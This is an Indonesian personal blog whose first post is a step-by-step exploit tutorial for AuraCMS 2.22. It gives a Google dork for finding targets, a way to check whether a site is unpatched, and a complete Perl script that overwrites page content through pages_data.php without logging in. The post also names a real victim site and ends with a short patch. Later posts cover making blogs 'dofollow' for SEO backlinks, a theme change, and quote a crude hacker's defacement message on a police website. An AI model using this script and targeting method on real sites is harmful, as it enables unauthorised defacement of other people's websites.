Coretan Teatzo

wuiih.. lama saya ga posting artikel mengenai dunia yang di cap “hitam” alias “underwear” ( Baca : Gelap ).

ya, pada kesempatan kali ini saya akan memberikan info mengenai sebuah tekhnik exploit yang dapat digunakan terhadap Aura CMS. tepatnya pada file pages_data.php, ( bug ini udah ada cukup lama lo, sekitar agustus tahun lalu )

CMS karya anak bangsa ini ternyata juga tidak terhindar dari yang namanya “bugs”. wuiih.. ngeri ah, punya saudara sendiri kok di “Exploit” ? >:<

Tenang sahabat, disini saya cuma memberikan info aja kok, dan juga pada artikel ini juga akan dibahas bagaimana untuk mem”patch” bug tersebut, jadi tenang aja buat para sahabat blogger yang kebetulan menggunakan Aura CMS, malah kalian harus bangga lo, menggunakan produk dalam negeri. >U

Ya, mari kita memancing, sebelumnya kita harus caru cacingnya dulu ( baca : umpan )

- ketik di google Powered By AuraCMS 2.22

- buka file pages_data.php nya, caranya ketik di address bar seperti ini :

http//www.target.com/js/pages/pages_data.php

ganti yang warna merah sesuai target yang didapat

- bila sitenya sudah di patch akan keluar kata-kata berikut

You Must Login First If Not Yet Have Account Please Register

- bila belum, biasanya kosong dan ada tulisan

{”pages”:[{"id":"1","judul":"blablabla"},{"id":"2","judul":"blablabla"},{"id":"3","blablabla":"blablabla"},{"id":"4","judul":"blablabla"},{"id":"5","judul":"blablabla"}],”pagging”:”"}

Kira-kira seperti itu,

- Selanjutanya siapkan sebuah script perl untuk exploitasinya, Oya sebelumnya bagi yang kompie-nya belum terinstall perl, bisa di donwload dulu disini >> CLICK HERE

berikut contoh script perl yang dibutuhkan :

use LWP:serAgent;
use HTTP:ookies;
use Getopt:ong;

my $isijudul = “ISI JUDUL”;
my $isikonten = “Isi Konten”;
my $ambilkue = “http://situstarget.com/index.php”;
my $kue = HTTP:ookies->new();
my $hasil = “”;
my $browser = LWP:serAgent->new;

$arbitrary = “http://situstarget.com/js/pages/pages_data.php?action=edit_saved&id=”;

$hasil = $browser->get($arbitrary);

$hasil = $browser->get($ambilkue);
$kue->extract_cookies($hasil);
$browser->cookie_jar($kue);

$arbitrary .= “1″;
$hasil = $browser->post($arbitrary,["judul"=>$isijudul,"konten"=>$isikonten],);
$konten = $hasil->content;
print $konten ;

waw, kok ada smiley nya ?? tenang, ga pengaruh kok tinggal copy paste aja. .

berikut sedikit penjelasannya :

my $isijudul = “ISI JUDUL”;    >> ganti dengan judul yang sahabat inginkan

my $isikonten = “Isi Konten”; >>  Ganti dengan konten yang sahabat inginkan juga,

my $ambilkue = “http://situstarget.com/index.php”; >>   Ganti http://situstarget.com dengan situs asli target sahabat tadi.

$arbitrary = “http://situstarget.com/js/pages/pages_data.php?action=edit_saved&id=”;      >> Ganti HANYA http://situstarget.com saja !, sesuai target sahabat.

- Copy script diatas dan save dengan extensi .pl, lalu simpan di direktori yang mudah di ingat, ini hanya untuk mempermudah step selanjutnya.  >> contoh :    C:aura.pl

- buka command prompt, sebelumnya ketik perl -v untuk mengecek, apakah perl yang di download tadi sudah terinstall sebagaimana mestinya. Jika sudah terinstall akan keluar versi dari installer perl tersebut.

- masuk ke direktori file aura.pl tadi ( udah tau kan caranya ? ),  misal ada di dir C, ketik aza   >>  cd C:

- jalankan file aura.pl tadi. caranya ketik >>   C:aura.pl

- lihat hasilnya, ……… Tara….!!, gimana sobat, berhasil kan ?, for example : http://www.pkpujogja.or.id/, ( maaf buat adminnya )

Ya, sekarang adalah bagaimana car mem-”patch” ( baca : tutup ) bug tersebut.

huff… setelah googling cukup lama, akhirnya dapat juga…

if(!cek_login()){

echo “Maaf anda tidak diperkenankan mengakses halaman ini”;

}else{

if (session_is_registered (’LevelAkses’) && $_SESSION['LevelAkses']==”Administrator”){

copy potongan script tersebut dan paste diatas code switch (@$_GET['action']){ pada file pages_data.php

lalu pada akhir halaman sebelum ?> (akhir TAG untuk php) beri tanda }} untuk menutup code yg sudah di copy tadi.

sekian sahabat, info dari saya kali ini, semoga bermanfaat, dan ingat, jangan disalahgunakan yah

Thanks, Teatzo

Membuat Blog Do Follow, ya sesuai janji saya pada postingan sebelumnya, pada kesempatan ini, saya ingin membagi trik kepada para sahabat Blogger, bagaimana mengubah dan meyulap blog anda menjadi berstatus DoFollow.

Untuk pengertian dari Dofollow, bisa dibaca di artikel saya sebelumnya,

Ok, sahabat blogger, langsung aza yah.

UNTUK PENGGUNA WORDPRESS

- Masuk ke Cpanel blog kalian (Cpanel webhosting kalian)

- Masuk ke File manager (bisa menggunakan filezilla), masuk ke direktori dimana WP kalian diinstall.

- masuk ke direktori file wp-includes, disini akan ada 2 buah file yang perlu kita edit:

1. Perubahan pertama yang perlu dilakukan ada pada file comment-template.php, kira kira ada pada baris ke 148 ( menurut kebanyakan refferensi yang saya dapatkan ada di baris ke 47-48 ? ) cari tulisan  >>

$return = “<a href=’$url’ rel=’external nofollow‘ class=’url’>$author</a>”;

Hapus yang berwarna merah, ubah menjadi :

$return = “<a href=’$url’ rel=’external‘ class=’url’ target=’_blank’>$author</a>”;

script tersebut sudah saya modifikasi, sehingga bila link di klik, halaman blog kita tidak tertutup ^^.

2. perubahan kedua ada pada file default-filters.php, kira-kira pada baris 154, cari tulisan berikut :

add_filter(’pre_comment_content’, ‘wp_rel_nofollow’, 15);

Hapus atau tambahkan karakter “double slash” ( // ) di awal baris

//add_filter(’pre_comment_content’, ‘wp_rel_nofollow’, 15);

Bila sahabat tidak ingin repot, bisa juga kok pake plugins berikut..

KLIK DISINI

mungkin dalam hati sahabat bertanya “Lo, ternyata ada pluginnya, terus ngapain dari tadi kita bahas rumit-rumit gitu ?”

Ingat semuanya itu ada prosesnya, tidak ada yang instan di dunia ini ( Mi instan pun harus direbus dulu ^0^), Membuat blog DoFollow-pun begitu, disini Saya ingin berbagi tips N trik disertai penjelasan yang Nalar kepada sahabat blogger, so sekarang saya harap sahabat telah mengerti prosesnya dan bisa meng-aplikasikannya di blog para sahabat masing-masing. hehe ^^

UNTUK PENGGUNA BLOGGER

- Login ke blogger kamu

- kemudian pilih Layout

- pilih Edit HTML

- Download Full Template ( hanya untuk berjaga-jaga, bila terjadi kesalahan, bisa di restore seperti semula lagi)

- Centang >> Expand Widget Templates

- Cari 2 penggalan script berikut :

<a expr:href=’data:comment.authorUrl’ rel=’nofollow’><data:comment.author/></a>

<a expr:href=’dataacklink.url’ rel=’nofollow’><dataacklink.title/></a>\

Kalian Bisa hapus saja yang berwarna merah, atau diganti dengan kata ‘external’

<a expr:href=’data:comment.authorUrl’ rel=’external’><data:comment.author/></a>

<a expr:href=’dataacklink.url’ rel=’external’><dataacklink.title/></a>

-Simpan Template Dan Lihat !!

Ya, demikian tutorial dari saya kali ini, kutunggu komentarnya yah.

Thanks, Teatzo

Hehe, kabar bagus buat sahabat blogger nih.. Sesuai judul yang saya posting diatas, blog ini sekarang sudah menjadi dofollow. hehe,
Lo, kabar bagus gimana toh ?, emang apa sih dofollow itu?

Dofollow itu kebalikan dari Nofollow… ^^

Do          : melakukan
Follow  : Ikut, mengikuti

weiits.. bang Teatzo, masih belum paham nih …T.T
hehe, tenang sahabat, itu cuma penjelasan secara kasarnya kok.

Ok, tau istilah backlink kan ?
ya, Backlink, merupakan suatu hal yang sangat penting dalam meningkatkan PageRank suatu blog/web di mesin pencari, misalnya Google. Karena salah satu cara mendapatkan backlink secara gratis adalah dengan mengisi komentar di banyak blog sehingga kita dapat memasukkan link alamat blog/website kita untuk mendapatkan backlink. Namun jika blog yang kita komentari memberlakukan aturan NoFollow maka link yang kita masukkan tadi tidak dianggap sebagai backlink.

Nah, sedangkan Status Do Follow pada komentar sebuah blog berarti blog itu akan menempatkan alamat URL yang memberi komentar sebagai backlink, jadi dalam kasus ini, Blog dengan Status Dofollow-lah banyak dicari oleh para blogger, untuk membuat backlink secara gratis di situs/blog lain dengan cara memberikan komentar terhadap artikel/tulisan yang ada pada web/blog tersebut.

Hehe.. sudah paham kan, apa itu Dofollow, so, berhubung saya Baik hati dan tidak rakus ( ceiillee ) maka saya membuat blog saya menjadi “Dofollow” agar para sahabat blogger dapat linkback gratis hanya dengan mengirimkan komentarnya.. ^^

xixixixi… ayo buruan, kutunggu commentsnya loh !!

Untuk cara membuat blog menjaddi dofollow, baca artikel dari saya selanjutnya

Di pertengahan Bulan April ini, Teatzo mencoba berganti imej, biar tampil lebih alim dan sweet.. xixixi..

yups, dari tema sebelumnya yang lebih monoton, saya mencoba tampilan baru, maksud hati ingin menjadi blogger professional ( dari hongkong ? ). pokoknya untuk kedepannya, saya ingin meningkatkan page rank blog saya yang masih ucup ini.. hehe, karena ada pepatah:

“Page Rank = Traffic = money”

mm, langkah pertama yang terpikirkan cuma mengganti theme aza.

setelah hampir 2 hari, 2 jam, 2 menit, dan 2 detik mencari, akhirnya ketemu juga yang cocok, ^^ thanks buat BlogohBlog dan Google . Buat sahabat blogger, enjoy aza, selamat menikmati theme yang baru.. ^^

thanks, Teatzo

Hmm.. lama tidak berkecimpungan di dunia maya, eh baru sempat untuk Online lagi dapet info yang cukup menarik dari blog teman saya > Metropolix’s blog

Im A Good Hacker Or Im A excellent deceiver ?

if you wanted to be hacker, Pay Me 100$ & I Can Teach U

MayBe I Can Fuck Your Ass Too..

xixixi, itulah penggalan kalimat yang ditulis TH0R, sang hacker di situs polri >> http://www.informatika.polri.go.id/

Yah.. demikian

Thanks,